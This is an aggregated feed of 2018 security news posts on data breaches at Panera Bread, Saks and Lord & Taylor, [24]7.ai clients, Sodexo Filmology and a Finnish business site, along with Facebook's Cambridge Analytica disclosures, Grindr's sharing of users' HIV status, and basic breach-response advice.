Sodexo Filmology reported the incident to the Information Commissioner’s Office and hired a specialist forensic investigation team.

“We would advise all employees who have used the site between 19th March-3rd April to cancel their payment cards and check their payment card statements,” reads the data breach notification issued by Sodexo Filmology.

“These incidents have been caused by a targeted attack on the system we use to host our Cinema Benefits platform, despite having put in place a number of preventative measures with CREST-approved security specialists.”

“We sincerely apologise for any inconvenience this has caused you and are doing all that we can to provide access to your benefits via alternative means. We will share more information on this with you, or your provider, in the coming days.”

Making a rapid search online, we can verify that the attack has been going on for several months, several employees reported fraudulent activities on the Money Saving Expert forum in February.

“After speaking to Filmology to ask exactly what had happened, I was informed that my bank details were stolen from the payment page and that the incident has been reported to the ICO. The hack on the payment page was carried out over 2 months and involved many accounts.” wrote the user Chris.

Pierluigi Paganini

(Security Affairs – Sodexo Filmology, data breach)

The post Sodexo Filmology data breach – Users need cancel their credit cards appeared first on Security Affairs.

One-Fifth of Open-Source Serverless Apps Have Critical Vulnerabilities

More than 20% of open-source serverless applications contain critical security vulnerabilities, according to an audit by PureSec. An evaluation of 1,000 open-source serverless projects revealed that 21% of them contained

The post One-Fifth of Open-Source Serverless Apps Have Critical Vulnerabilities appeared first on The Cyber Security Place.

130,000 Finnish user data exposed in third largest data breach ever happened in the country

Personal information belonging to more than 130,000 Finnish citizens have been compromised in the third largest data breach ever happened in the country.

The data breach affected a website maintained by the New Business Center in Helsinki (“Helsingin Uusyrityskeskus”), that is company that provides business advice to entrepreneurs.

“Data batches have overwritten username and password for over 130,000 users. The violation occurred on an open website for business ideas (liiketoimintasuunnitelma.com).” reported the local media Svenska.

After the discovery of the data breach on 3rd April, the new business center in Helsinki has taken down the affected website.

The bad news for the Finnish citizens is that the password stored on the website were in plain text.

The Finnish Communications Regulatory Authority (FICORA) is warning users of a massive data breach.

“About 130,000 user accounts and plaintext passwords have been revealed. Other confidential information may also have been disclosed. Due to the number of user accounts exposed, this is Finland’s third largest data breach.” states the advisory published by FICORA.

“We are very sorry for all the people who have been subjected to crime and who may be affected by mental or financial disadvantages. Unfortunately, we are not yet able to know exactly how many people are and what information this information breaks. We have filed an offense report, and the parties do not need to report to the police separately,” said Jarmo Hyökyvaara, Chairman of the Board of the New Business Center of Helsinki.

“The maintenance and security of our service was the responsibility of our subcontractor, our long-term partner. Unfortunately, the security of the service has not been enough to prevent this kind of attack. This is, in part, our mistake, and as a subscriber and owner of the service we are responsible for this.”

data breach

The New Business Center in Helsinki added that detailed information about its users was not exposed because they were stored on a different system, which was not affected by the data breach.

The company reported the security breach to law enforcement that is investigating the case.

Once the website will be online again, users are recommended to change their passwords immediately, I also suggest changing the passwords on any other service online for which the customers used the same credentials.

Pierluigi Paganini

(Security Affairs – New Business Center in Helsinki, data breach)

The post 130,000 Finnish user data exposed in third largest data breach ever happened in the country appeared first on Security Affairs.

Finland’s 3rd Largest Data Breach Exposes 130,000 Users’ Plaintext Passwords

Over 130,000 Finnish citizens have had their credentials compromised in what appears to be third largest data breach ever faced by the country, local media reports. Finnish Communications Regulatory Authority (FICORA) is warning users of a large-scale data breach in a website maintained by the New Business Center in Helsinki ("Helsingin Uusyrityskeskus"), a company that provides business

Delta and Sears suffer data breach, credit card information compromised

US-based Delta Air Lines and Sears Holdings, the owners of Sears and Kmart, have announced that the breach suffered by chatbot company [24]7.ai has resulted in the compromise of credit card information of its customers. According to a statement by [24]7.ai, which provides online support services to the two companies, the incident began on September 26 and was discovered and contained on October 12, 2017. Sears Holdings says that the incident involved unauthorized access to … More

The post Delta and Sears suffer data breach, credit card information compromised appeared first on Help Net Security.

Nearly Half of Organizations Targeted Again Within a Year of Suffering a ‘Significant’ Cyberattack, Report Reveals

Nearly half of organizations that suffered a “significant” digital attack fell victim to bad actors again within a year’s time, a new security trends report revealed.

According to Mandiant’s “M-Trends 2018” report, 49 percent of managed detection and response customers that remediated a large-scale attack suffered an incident from the same or a similarly motivated threat group within one year. The initial assaults consisted of data theft, credential harvesting and spear phishing, among other techniques.

Unpacking Repeat Cyberattack Trends

Mandiant admitted to not having looked at recompromise figures since it released its “M-Trends 2013” study five years ago. That report found that 38 percent of clients had suffered another attack after successful remediation.

The number of follow-up attacks were somewhat higher in 2017: 56 percent of customers weathered at least one significant attack from the same threat group or one like it. At the same time, the vast majority (86 percent) of organizations that remediated more than one significant cyberattack hosted more than one unique bad actor in their IT environment.

Some regional differences were apparent over the course of the year. Less than half of customers in the Americas and Europe, Middle East and Africa (EMEA) experienced another attack of consequence and/or multiple threat actors. By contrast, 91 percent of Asia-Pacific (APAC) clients dealt with a subsequent campaign, while 82 percent of organizations from that region suffered a significant attack from multiple groups.

The Good News and Bad News About Dwell Time

Dwell time, or the average number of days during which attackers lurked in a victim’s network prior to detection, increased across several regions in 2017, according to the report. The APAC average increased nearly three times, from 172 days to 489 days. The EMEA dwell time growth was more modest at 40 percent, from 106 days to 175 days.

Stuart McKenzie, vice president of Mandiant at FireEye, expressed disappointment in the growth of the median EMEA dwell time but noted that it’s not all bad news.

“On the positive side, we’ve seen a growing number of historic threats uncovered this year that have been active for several hundred days,” McKenzie said, as quoted by Infosecurity Magazine. “Detecting these long-lasting attacks is obviously a positive development, but it increases the dwell time statistic.”

During the same survey period, the dwell time for the Americas decreased from 99 days to 75.5 days. The average across all regions rose slightly from 99 days to 101 days.

Looking Ahead

In the report, Mandiant shared its prediction that foreign digital espionage groups will continue to prey upon U.S. companies and service providers in 2017. It also predicted that bad actors will target the software supply chain to spy on developers and software-makers over the course of the year.

The post Nearly Half of Organizations Targeted Again Within a Year of Suffering a ‘Significant’ Cyberattack, Report Reveals appeared first on Security Intelligence.

100% of Web Apps Contain Vulnerabilities

A totality – a full 100% – of web applications are vulnerable to hackers.According to Trustwave’s 2018 Global Security Report, derived from the analysis of billions of logged security and

The post 100% of Web Apps Contain Vulnerabilities appeared first on The Cyber Security Place.

[24]7.ai Payment Card Breach affected major firms, including Best Buy, After Delta Air Lines and Sears Holdings

A payment card breach suffered by [24]7.ai. between September 26 and October 12, 2017, is impacting major firm, including Best Buy, After Delta Air Lines and Sears Holdings.

Another day another data breach, while media are reporting the securityb breach suffered Delta Air Lines and Sears Holdings due to the [24]7.ai a payment card brech, also Best Buy company confirmed to have been impacted by the incident.

Best Buy offers chat services for customers via their phone or computer, while [24]7.ai provides online services to businesses in different industries, including Delta Air Lines and Sears Holdings, this means that other firm could have been impacted.

Best Buy annouced it will notify affected customers and offer free credit monitoring to them.

At the time of writing there is new about the extent of payment card breach, Best Buy pointed out that only a small fraction of online customers could have been impacted by the [24]7.ai hack.

“We, like many businesses, use a third-party for the technology behind this service and that company, [24]7.ai, told us recently that they were the victim of a cyber intrusion. Their information suggests that the dates for this illegal intrusion were between Sept. 27 and Oct. 12, 2017. [24]7.ai has indicated that customer payment information may have been compromised during that time and, if that were the case, then a number of Best Buy customers would have had their payment information compromised, as well.” reads the security advisory published by Best Buy.

“As best we can tell, only a small fraction of our overall online customer population could have been caught up in this [24]7.ai incident, whether or not they used the chat function.”

best buy

Delta published a security advisory to notify its customers, the airline speculates attackers infected [24]7.ai systems with a malware that was able to siphon payment card data entered on websites that use the [24]7.ai chat software. It seems that customers of the affected firms may be impacted even if they have not directly used the chat functionality.

The instrusion occurred between September 26 and October 12, 2017.

“We understand malware present in [24]7.ai’s software between Sept. 26 and Oct. 12, 2017, made unauthorized access possible for the following fields of information when manually completing a payment card purchase on any page of the delta.com desktop platform during the same timeframe: name, address, payment card number, CVV number, and expiration date.” reads the advisory published by Delta Airline.

No other customer personal information, such as passport, government ID, security or SkyMiles information was impacted.”

According to Delta, hundreds of thousands of customers may have been impacted by the payment card breach.

Sears Holdings explained that the payment card breach has impacted the credit card information of less than 100,000 customers.

Both Sears and Delta Airline were notified by [24]7.ai in mid March while the incident occurred in 2017.

Pierluigi Paganini

(Security Affairs – [24]7.ai, Best Buy)

The post [24]7.ai Payment Card Breach affected major firms, including Best Buy, After Delta Air Lines and Sears Holdings appeared first on Security Affairs.

Facebook admits public data of its 2.2 billion users has been compromised

Facebook dropped another bombshell on its users by admitting that all of its 2.2 billion users should assume malicious third-party scrapers have compromised their public profile information. On Wednesday, Facebook CEO Mark Zuckerberg revealed that "malicious actors" took advantage of "Search" tools on its platform to discover the identities and collect information on most of its 2 billion

Smashing Security #072: Why are firms so cr*p with our private data?

Ss episode 72 thumb

Grindr, MyFitnessPal, and Panera Bread. They’ve all had data breach scares of varying degrees this week. Some handled the security breaches well, some didn’t. We took a look at how well different firms are respecting your data privacy.

All this and more is discussed in the latest edition of the “Smashing Security” podcast by computer security veterans Graham Cluley and Carole Theriault.

Security Affairs: Facebook: Cambridge Analytica scandal affected 87 Million users

Facebook revealed on Wednesday that 87 million users have been affected by the Cambridge Analytica case, much more than 50 million users initially thought.

The social network giant recently unveiled clearer terms of service to ensure transparency to its users about data sharing.

Facebook’s chief technology officer Mike Schroepfer provided further details on the case, including new estimations for the number of affected users.

“In total, we believe the Facebook information of up to 87 million people — mostly in the US — may have been improperly shared with Cambridge Analytica,” Schroepfer said.

The CTO also explained how Facebook is implementing new privacy tools for its users that would be available by next week.

“People will also be able to remove apps that they no longer want. As part of this process we will also tell people if their information may have been improperly shared with Cambridge Analytica,” he added.

“Overall, we believe these changes will better protect people’s information while still enabling developers to create useful experiences.”

Facebook- Cambridge Analytica

Next week, on April 11, Facebook founder Mark Zuckerberg would appear at the Congress to address privacy issues.

The hearing will “be an important opportunity to shed light on critical consumer data privacy issues and help all Americans better understand what happens to their personal information online,” said the committee’s Republican chairman Greg Walden and ranking Democrat Frank Pallone in a statement.

“We appreciate Mr. Zuckerberg’s willingness to testify before the committee, and we look forward to him answering our questions.”

The situation for Facebook could get worse after these last revelations, a few days ago Zuckerberg said it would take “a few years” to fix the problems uncovered by the revelations on data misuse.

Zuckerberg tried to reinforce the positive image of its firms, sustaining that one of the biggest error he made is that Facebook is “idealistic,” the

“Well, I don’t think it’s going to take 20 years. I think the basic point that you’re getting at is that we’re really idealistic. When we started, we thought about how good it would be if people could connect, if everyone had a voice. Frankly, we didn’t spend enough time investing in, or thinking through, some of the downside uses of the tools. So for the first 10 years of the company, everyone was just focused on the positive.” Zuckerberg told Vox.com

“I think now people are appropriately focused on some of the risks and downsides as well. And I think we were too slow in investing enough in that. It’s not like we did nothing. I mean, at the beginning of last year, I think we had 10,000 people working on security. But by the end of this year, we’re going to have 20,000 people working on security.” 

In response to the Cambridge Analytica case, Facebook deleted dozens of accounts linked to Russia that were used to spread propaganda.

Facebook announced to have revoked the accounts of 70 Facebook and 65 Instagram accounts and removed 138 Facebook pages controlled by the Russia-based Internet Research Agency (IRA), also known as the Russian troll farm due to its misinformation campaigns.

The unit “has repeatedly used complex networks of inauthentic accounts to deceive and manipulate people who use Facebook, including before, during and after the 2016 US presidential elections,” explained Facebook chief security officer Alex Stamos.

Zuckerberg added that the Russian agency“has been using complex networks of fake accounts to deceive people.”

“While we respect people and governments sharing political views on Facebook, we do not allow them to set up fake accounts to do this. When an organization does this repeatedly, we take down all of their pages, including ones that may not be fake themselves.”

Pierluigi Paganini

(Security Affairs – Cambridge Analytica, Facebook)

The post Facebook: Cambridge Analytica scandal affected 87 Million users appeared first on Security Affairs.



Security Affairs

Facebook: Cambridge Analytica scandal affected 87 Million users

Facebook revealed on Wednesday that 87 million users have been affected by the Cambridge Analytica case, much more than 50 million users initially thought.

The social network giant recently unveiled clearer terms of service to ensure transparency to its users about data sharing.

Facebook’s chief technology officer Mike Schroepfer provided further details on the case, including new estimations for the number of affected users.

“In total, we believe the Facebook information of up to 87 million people — mostly in the US — may have been improperly shared with Cambridge Analytica,” Schroepfer said.

The CTO also explained how Facebook is implementing new privacy tools for its users that would be available by next week.

“People will also be able to remove apps that they no longer want. As part of this process we will also tell people if their information may have been improperly shared with Cambridge Analytica,” he added.

“Overall, we believe these changes will better protect people’s information while still enabling developers to create useful experiences.”

Facebook- Cambridge Analytica

Next week, on April 11, Facebook founder Mark Zuckerberg would appear at the Congress to address privacy issues.

The hearing will “be an important opportunity to shed light on critical consumer data privacy issues and help all Americans better understand what happens to their personal information online,” said the committee’s Republican chairman Greg Walden and ranking Democrat Frank Pallone in a statement.

“We appreciate Mr. Zuckerberg’s willingness to testify before the committee, and we look forward to him answering our questions.”

The situation for Facebook could get worse after these last revelations, a few days ago Zuckerberg said it would take “a few years” to fix the problems uncovered by the revelations on data misuse.

Zuckerberg tried to reinforce the positive image of its firms, sustaining that one of the biggest error he made is that Facebook is “idealistic,” the

“Well, I don’t think it’s going to take 20 years. I think the basic point that you’re getting at is that we’re really idealistic. When we started, we thought about how good it would be if people could connect, if everyone had a voice. Frankly, we didn’t spend enough time investing in, or thinking through, some of the downside uses of the tools. So for the first 10 years of the company, everyone was just focused on the positive.” Zuckerberg told Vox.com

“I think now people are appropriately focused on some of the risks and downsides as well. And I think we were too slow in investing enough in that. It’s not like we did nothing. I mean, at the beginning of last year, I think we had 10,000 people working on security. But by the end of this year, we’re going to have 20,000 people working on security.” 

In response to the Cambridge Analytica case, Facebook deleted dozens of accounts linked to Russia that were used to spread propaganda.

Facebook announced to have revoked the accounts of 70 Facebook and 65 Instagram accounts and removed 138 Facebook pages controlled by the Russia-based Internet Research Agency (IRA), also known as the Russian troll farm due to its misinformation campaigns.

The unit “has repeatedly used complex networks of inauthentic accounts to deceive and manipulate people who use Facebook, including before, during and after the 2016 US presidential elections,” explained Facebook chief security officer Alex Stamos.

Zuckerberg added that the Russian agency“has been using complex networks of fake accounts to deceive people.”

“While we respect people and governments sharing political views on Facebook, we do not allow them to set up fake accounts to do this. When an organization does this repeatedly, we take down all of their pages, including ones that may not be fake themselves.”

Pierluigi Paganini

(Security Affairs – Cambridge Analytica, Facebook)

The post Facebook: Cambridge Analytica scandal affected 87 Million users appeared first on Security Affairs.

Cyber Security Roundup for March 2018

In the wake of the global political fallout over the Salisbury nerve agent attack, there are reports of a growing threat of Russian state or Russian state-affiliated hacking groups conducting cyber attack reprisals against UK organisations, government officials have directly warned bosses at electricity, gas and water firms, Whitehall departments and NHS hospitals to prepare for a state-sponsored cyber assault


Large-scale data breaches were disclosed with Under Armour’s Fitness App MyFitnessPal (1.5 million personal records compromised), Orbitz (880k payment cards at risk), and at a Walmart partner (1.3 million personal records compromised). The latter was caused when an AWS S3 bucket holding a Walmart database was left with open access, which isn't the first time a cloud service misconfiguration has caused a major data breach.

TalkTalk were warned about their website’s poor security after a hacker known as 'B' disclosed a cross-site scripting vulnerability on the talktalk.co.uk website to Sky News. TalkTalk was given a record £400,000 fine by the Information Commissioner's Office following a major website breach in October 2015, which 157,000 customer details were stolen. And the company were told to "be more diligent and more vigilant” and was fined a further £100,000 after data belonging to 21,000 customers were exposed to "rogue" staff at an Indian call centre.

GitHub survived the largest ever DDoS attack recorded thanks to Akamai DDoS protection, which peaked at a massive 1.35 terabytes of data per second.

UK schools were warned they were soft targets for cybercriminals, experts believe many schools are ill-equipped to prevent cyber thefts, with sensitive data such as children’s medical records said to be lucrative on the dark web. There has been a number of security incidents disclosed involving UK schools in recent months.
Gwent Police are facing scrutiny by the Information Commissioner's Office for not informing 450 people that hackers may have accessed their personal information, after discovering the breach over a year ago.

A hacker alleged to be behind a gang the ran the Carbanak and Cobalt bank target malware has been arrested. The gang is reported to be responsible for the theft of up to billion euros through bank transfers and from cash machines, from over 100 banks since 2013


NEWS

AWARENESS, EDUCATION AND THREAT INTELLIGENCE

REPORTS

How safe is your personal information?

Another day, another data breach. Recent news about cybercriminals obtaining more than 5 million credit card numbers from high-end U.S. retailers joined a series of major hacks and online data breaches. Unfortunately, the frequency of attacks on Americans’ personal information has fostered a feeling of inevitability. In fact, according to results released today from a telephone survey conducted by The Harris Poll for the American Institute of CPAs (AICPA) of 1,006 Americans adults in the … More

The post How safe is your personal information? appeared first on Help Net Security.

Panera Bread left millions of customer records exposed online for months

The website belonging to the Panera Bread restaurant chain, Panerabread.com, exposed personal information in plain text for months.

The company has more than 2,100 retail locations in the United States and Canada, its customers could order food online for pickup in stores or for delivery.

Panera Bread exposed the data at least for eight months after the company was first notified of the data leak.

On Monday, the popular security expert Brian Krebs reported a bug affecting the Panera’s website that left millions of customer records exposed in plain text.

Exposed data included names, email addresses, physical addresses, birthdays, and the last four digits of their credit cards.

The company also exposed customer’s Panera loyalty card number, which could be used by scammers to spend prepaid accounts or to steal value from Panera customer loyalty accounts.

Panera Bread data breach

The disconcerting aspect of the story is that the issue was first notified to Panera Bread by the security researcher Dylan Houlihan on August 2, 2017.

In a first time the IT staff did not acknowledge the flaw, but after further investigation, the director of information technology Mike Gustavison told to the expert that the issue was fixed.

Houlihan verified that the issue was not fixed and on April 2nd reported it to Brian Krebs.

Panerabread.com, the Web site for the American chain of bakery-cafe fast casual restaurants by the same name, leaked millions of customer records — including names, email and physical addresses, birthdays and the last four digits of the customer’s credit card number — for at least eight months before it was yanked offline earlier today, KrebsOnSecurity has learned.” states the blog post published by Krebs.

This incident is disconcerting for many aspects, such as the response of the company and the way it managed customers’ data.

Only after Brian Krebs contacted Panera Bread, the company took the website offline.

“It is not clear yet exactly how many Panera customer records may have been exposed by the company’s leaky Web site, but incremental customer numbers indexed by the site suggest that number may be higher than seven million.” continues Krebs.

“It’s also unclear whether any Panera customer account passwords may have been impacted.”

Panera told Fox Business that the data leak affected only about 10,000 records but experts at Hold Security estimated that the number of affected accounts is approximately 37 million.

In a written statement, Panera declared it had fixed the problem within less than two hours of being notified by Brian Krebs, but the expert correctly asked why Panera did not explain why it has taken eight months to fix the issue after Houlihan reported it.

Pierluigi Paganini

(Security Affairs – Panera Bread, Data Leak)

The post Panera Bread left millions of customer records exposed online for months appeared first on Security Affairs.

Panerabread.com breach could have impacted millions

Customers who signed up for a Panerabread.com account in order to order fast-casual baked goods may want to guard their dough. Security researcher Brian Krebs reported yesterday that the website for the bakery chain leaked millions of customer records, including names, emails, physical addresses, birthdays, and the last four digits of customers’ credit card numbers.

Until Monday, millions of customer data points were accessible on the site as plain text—an oversight that Krebs maintains left data exposed for at least eight months. While Panera was contacted by security researcher Dylan Houlihan back in August 2017 about the leak, it appears they did not take action to fix it, despite reassurances they were working on a resolution.

Once Krebs notified Panera about the breach, the company took its website offline for a brief period of time. When the site came back online, the customer data was no longer available.

Panera issued statements to the press that they moved to fix the breach hours after Krebs reached out to them, though they didn’t address the eight-month gap in action from their first notification. In addition, they stated that only 10,000 customer records were exposed, though researcher HoldSecurity claims it’s more like 37 million.

While this story is still developing, we urge our readers to take necessary precautions to protect their data. An unprecedented season of breaches in 2017 gave way to more breach discoveries in early 2018, with companies such as Orbitz, Lord & Taylor/Saks Fifth Avenue, and MyFitnessPal collectively exposing more than 155 million users.

Recognize that while the flood of data breaches in itself is alarming, we still haven’t seen the full potential for the consequences of giving such valuable data freely to the black market. As tax season comes to a close, for example, we may be poised for a deluge of fraudulent claims and identity theft as criminals try to cash in on their data. Because of this, we suggest taking similar steps as after the Equifax breach, which includes monitoring credit reports, staying on high alert for email, phone, or text scams, and enabling alerts on your accounts.

The more we see infringements of the size and proportion of the Panerabread.com breach, the more we caution users to just assume their data has been compromised. Right now, the best we can do—until companies buckle down harder on security and privacy protocols—is to caution everyone to protect their data from being used to harm them.

Stay safe, everyone.

The post Panerabread.com breach could have impacted millions appeared first on Malwarebytes Labs.

Hackers steal payment card data of 5 million Saks, Lord & Taylor customers

Hackers have apparently managed to compromise the cash register systems at Saks Fifth Avenue and Lord & Taylor stores in the US and Canada, and have stolen payment card data of some five million customers, a cybersecurity research firm has revealed on Sunday. What happened? “On March 28, 2018, a notorious hacking JokerStash syndicate, also known as Fin7 announced the latest breach of yet another major corporation, with more than five million stolen payment cards … More

The post Hackers steal payment card data of 5 million Saks, Lord & Taylor customers appeared first on Help Net Security.

Panera Bread’s half-baked security

We’ve heard it all before. XYZ Company “takes your data security very seriously.”

Most commonly you’ll hear these words just after a company has suffered an embarrassing data breach, perhaps having carelessly exposed the personal information of innocent customers onto the net or had a database stolen by hackers.

The truth is that it’s a brave organisation which promises it will never suffer a serious security incident. Accidents can happen, human weaknesses can leave open vulnerabilities which hackers may be able to exploit, partners who work alongside your company may have had their own security fail which impacted your business.

In these instances, the only way to recover your customers’ trust and retrieve your company’s reputation from being tarnished too much is to respond appropriately to the incident. Often, in fact, the response to a security breach will be more critical to your company’s brand than the incident itself.

And, if you want an example of a company that has got it massively wrong look no further than Panera Bread, the North American chain of over 2000 bakery cafés.

If you visit Panera Bread’s website today, you won’t find the usual collection of sandwiches, soups, salads, and sausage rolls. Instead you’ll probably see a message like this:

Panera Bread’s website is down. In fact, it’s the second time it’s been down in the last couple of days. Let me explain why…

In August 2017, a security researcher called Dylan Hoilihan privately informed Panera Bread of a serious security vulnerability on the delivery.panerabread.com website, which meant that details of any signed-up customers’ full names, email addresses, phone numbers, and the last four digits of their saved credit card numbers could be scooped up.

A member of Panera Bread’s information security team responded to Houlihan, seemingly skeptical of the report – believing it to be a scammy sales pitch.

After a few days and some to-and-fro (which you can read on Houlihan’s blog post), Panera Bread confirmed it was working on resolving the issue.

That was back in August 2017.

As each month passes, Houlihan investigates whether the Panera Bread security vulnerability still exists – and, sadly, it does.

And so, eight months later and frustrated by the lack of response, he informs security blogger Brian Krebs who publicly reveals that millions of customer records are at risk.

Before publishing details of the problem, Krebs spoke to Panera Bread’s CIO John Meister, and the website was soon afterwards briefly taken down for “essential system maintenance”.

Krebs, no doubt, assumed that the problem was being resolved. But no explanation was made as to why no fix was put in place back in August 2017, when they were first informed of the problem by Houlihan.

And if you think that’s bad, things get worse…

Panera Bread told Fox News that “fewer than 10,000 consumers have been potentially affected by this issue” and that “this issue is resolved”.

However, within minutes of that claim it became apparent that the same vulnerability was *still* present on the website – and that the number of customer records exposed may total over 37 million.

And that’s why Panera Bread’s website is down again.

Let’s hope it is taking data security seriously now. Although wouldn’t it have been much better if the company had taken decisive action when the issue was first reported to them eight months ago?

First 5 Steps When Faced with a Data Breach

For the average person or company, experiencing a data breach, or any kind of electronic security incident, it can be a lot like a car accident. It’s disorienting. It’s confusing. You’re not entirely sure what to do next.

In situations like this, it is often comforting to have a standard policy of some kind in place. At the same time, it is important to recognize not all security issues are the same, therefore, some cannot be properly addressed with a standard incident response procedure.

Experience comes into play in most situations, but ultimately it is knowledge combined with experience that makes it possible to navigate difficult circumstances and come out stronger as a result. If you think you might be at risk for a data breach or another kind of electronic or digital security issue, here are some things you should consider as part of your response.

Isolate

If your data breach was discovered on any particular piece of hardware, like a server, a cloud machine, or even a mobile device, your first order of business is to isolate that machine from the rest of your network.

The reasons for this are two-fold. First, the overwhelming majority of data breaches rely almost entirely on network access in order to succeed. Second, your top priority is to preserve any evidence available to you and your team. Unless you isolate the breach, there is a better-than-average chance your evidence could be destroyed by the attacker.

Document

It is absolutely vital you keep detailed records of everything you do from the moment the data breach is discovered. This is the undisputed top priority of any investigation or incident response. Without documentation, there is no way you will be able to put the pieces together later and there is no way you’ll be able to prove you performed your due diligence in the event of a dispute.

Photograph

While it may seem strange to suggest that somehow photographs can help you solve a digital data breach, the fact is photographs are a vital tool in any investigation. As all programmers know, software problems are inherently hardware problems. If you have a reliable record of where your hardware was, how it was connected, what was on the screen, how the hardware was configured, what the conditions were at the time and so forth, you may have found details that can help you solve the existing problem or prevent future issues.

Interview

Any person indirectly or directly involved with the systems that were breached should be exhaustively interviewed. Leaving aside for the moment the possibility one of your employees or contractors could have been involved, having eyewitness accounts of the moments leading up to the breach could give you vital clues as to its origin and extent.

Use Your Knowledge

All the investigating in the world isn’t going to help you if you don’t put the knowledge gained to good use. Take what you’ve learned and prepare for the next breach. By and large, digital security issues boil down to inadequate knowledge of how security works. Solutions to that problem are hard to come by but are possible with the right steps.

The post First 5 Steps When Faced with a Data Breach appeared first on TechWorm.

Grindr shared people’ HIV status with other companies

An analysis conducted by the Norwegian research nonprofit SINTEF revealed that the popular Grindr gay dating app is sharing its users’ HIV status with two other companies.

Grindr gay-dating app made the headlines again, a few days ago an NBC report revealed that the app was affected by 2 security issues (now patched) that could have exposed the information of its more than 3 million daily users.

An attacker could have exploited the feature to access location data, private messages to other users, and profile information, even if they’d opted out of sharing such information.

The security issues were identified by Trever Faden, CEO of the property management startup Atlas Lane, while he was working at his website C*ckblocked that allowed users to see who blocked them on Grindr.

Faden discovered that once a Grindr logged in his service, it was possible to access to a huge quantity of data related to their Grindr account, including unread messages, email addresses, and deleted photos.

While the media were sharing the news, another disconcerting revelation was made by BuzzFeed and the Norwegian research nonprofit SINTEF, BuzzFeed and the Norwegian research nonprofit SINTEF.BuzzFeed and the Norwegian research nonprofit SINTEF.BuzzFeed and the Norwegian research nonprofit SINTEF, Grindr has been sharing data on whether its users have HIV with two outside companies, according to BuzzFeed and the Norwegian research nonprofit SINTEF.

“SVT and SINTEF conducted an experiment the 7th of February 2018 to analyse privacy leaks in the dating application Grindr. This was realised for the Sweedish TV program “Plus granskar“, that you may watch online.reported SINTEF.

“We discovered that Grindr contains many trackers, and shares personal information with various third parties directly from the application.”

Grindr HIV data.jpg

Profiles include sensitive information such as HIV status, when is the last time a user got tested, and whether they’re taking HIV treatment or the HIV-preventing pill PrEP.

“It is unnecessary for Grindr to track its users HIV Status using third-parties services. Moreover, these third-parties are not necessarily certified to host medical data, and Grindr’s users may not be aware that they are sharing such data with them.” added SINTEF.

The disconcerting aspect of this revelation is that Grindr has been sharing users’ HIV statuses and test dates with two companies that help optimize the app, called Apptimize and Localytics.

“The two companies — Apptimize and Localytics, which help optimize apps — receive some of the information that Grindr users choose to include in their profiles, including their HIV status and “last tested date.” BuzzFeed reports

“Because the HIV information is sent together with users’ GPS data, phone ID, and email, it could identify specific users and their HIV status, according to Antoine Pultier, a researcher at the Norwegian nonprofit SINTEF, which first identified the issue.”

In some cases, this data was not protected by encryption.

Hours after BuzzFeed’s report, Grindr told Axios that it had made a change to stop sharing users’ HIV status. The company’s security chief, Bryce Case, told Axios that he felt the company was being “unfairly … singled out” in light of Facebook’s Cambridge Analytica scandal and said that the company’s practices didn’t deviate from the industry norm.

Grindr’s chief technology officer, Scott Chen, pointed out that data was shared “under strict contractual terms that provide for the highest level of confidentiality, data security, and user privacy.”

Anyway, Grindr doesn’t sell user data to third parties.

In a statement released Monday afternoon, Grindr confirmed that it would stop sharing the HIV data.

The company also confirmed to CNNMoney that it has already deleted HIV data from Apptimize, and is in the process of removing it from Localytics.

Pierluigi Paganini

(Security Affairs – mobile app, privacy)

The post Grindr shared people’ HIV status with other companies appeared first on Security Affairs.

Fin7 hackers stole 5 Million payment card data from Saks Fifth Avenue and Lord & Taylor Stores

FIN7 hackers stole credit and debit card information from millions of consumers who have purchased goods at Saks Fifth Avenue and Lord & Taylor stores.

A new data breach made the headlines, the victim is Saks Fifth Avenue and Lord & Taylor stores. According to the parent company Hudson’s Bay Company (HBC), the security breach exposed customer payment card data, customer payment card data at certain Saks Fifth Avenue, the discount store brand Saks Off 5TH and Lord & Taylor stores in North America are impacted.

“We recently became aware of a data security issue involving customer payment card data at certain Saks Fifth Avenue, Saks OFF 5TH, and Lord & Taylor stores in North America. We identified the issue, took steps to contain it, and believe it no longer poses a risk to customers shopping at our stores.” reads the official statement issued by Lord & Taylor.

“While the investigation is ongoing, there is no indication that this affects our e-commerce or other digital platforms,”

The hackers did not compromise the HBC’s e-commerce or other digital platforms, the company promptly informed authorities and hired security investigators to

“We are working rapidly with leading data security investigators to get our customers the information they need, and our investigation is ongoing. We also are coordinating with law enforcement authorities and the payment card companies,” continues the announcement.

The HBC issued the following statement:

“HBC has identified the issue, and has taken steps to contain it,” the company said in a statement. “Once the Company has more clarity around the facts, it will notify customers quickly and will offer those impacted free identity protection services, including credit and web monitoring. HBC encourages customers to review their account statements and contact their card issuers immediately if they identify activity or transactions they do not recognize.”

The data breach was first reported by threat intelligence firm Gemini Advisory, which noticed the offer for sale of over five million stolen credit and debit cards on a cybercrime marketplace called JokerStash.

Saks Fifth Avenue Lord & Taylor stores

The researchers linked the security breach to the financially-motivated FIN7 APT group also known as Carbanak or Anunak.

The group continuously changed attack techniques and implemented new malware obfuscation methods. The FIN7 group has been active since late 2015, it was highly active since the beginning of 2017.

Fin7 was spotted early 2017 when it targeted personnel involved with the United States Securities and Exchange Commission (SEC) filings at various organizations with a new PowerShell backdoor dubbed POWERSOURCE.

“On March 28, 2018, a notorious hacking JokerStash syndicate, also known as Fin7 announced the latest breach of yet another major corporation, with more than five million stolen payment cards offered for sale on the dark web. Several large financial institutions have confirmed that all tested records had been used before at Saks Fifth Avenue, Saks Fifth Avenue OFF 5TH, a discounted offset brand of luxury Saks Fifth Avenue stores, as well as Lord & Taylor stores.” the company said in a post.

“Several large financial institutions have confirmed that all tested records had been used before at Saks Fifth Avenue, Saks Fifth Avenue OFF 5TH, a discounted offset brand of luxury Saks Fifth Avenue stores, as well as Lord & Taylor stores,” 

As of Sunday, only a small portion of compromised records have been offered for sale, crooks offered roughly 35,000 records for Saks Fifth Avenue and 90,000 records for Lord & Taylor.

“As of this writing, approximately 125,000 records have been released for sale, although we expect the entire cache to become available in the following months.” added Gemini.

At the time of writing HBC did not provide details on the extent of the security breach, it is still unclear how the hackers have stolen payment card data, experts believe hackers may have compromised point-of-sale systems.

“Based on the analysis of records that are currently available, it appears that all Lord & Taylor and 83 US based Saks Fifth Avenue locations have been compromised. In addition, we identified three potentially compromised stores located in Ontario, Canada. However, the majority of stolen credit cards were obtained from New York and New Jersey locations.” concluded Gemini.

Pierluigi Paganini

(Security Affairs – HBC data breach, FIN7 APT)

The post Fin7 hackers stole 5 Million payment card data from Saks Fifth Avenue and Lord & Taylor Stores appeared first on Security Affairs.

Why Multi-cloud Security Requires Rethinking Network

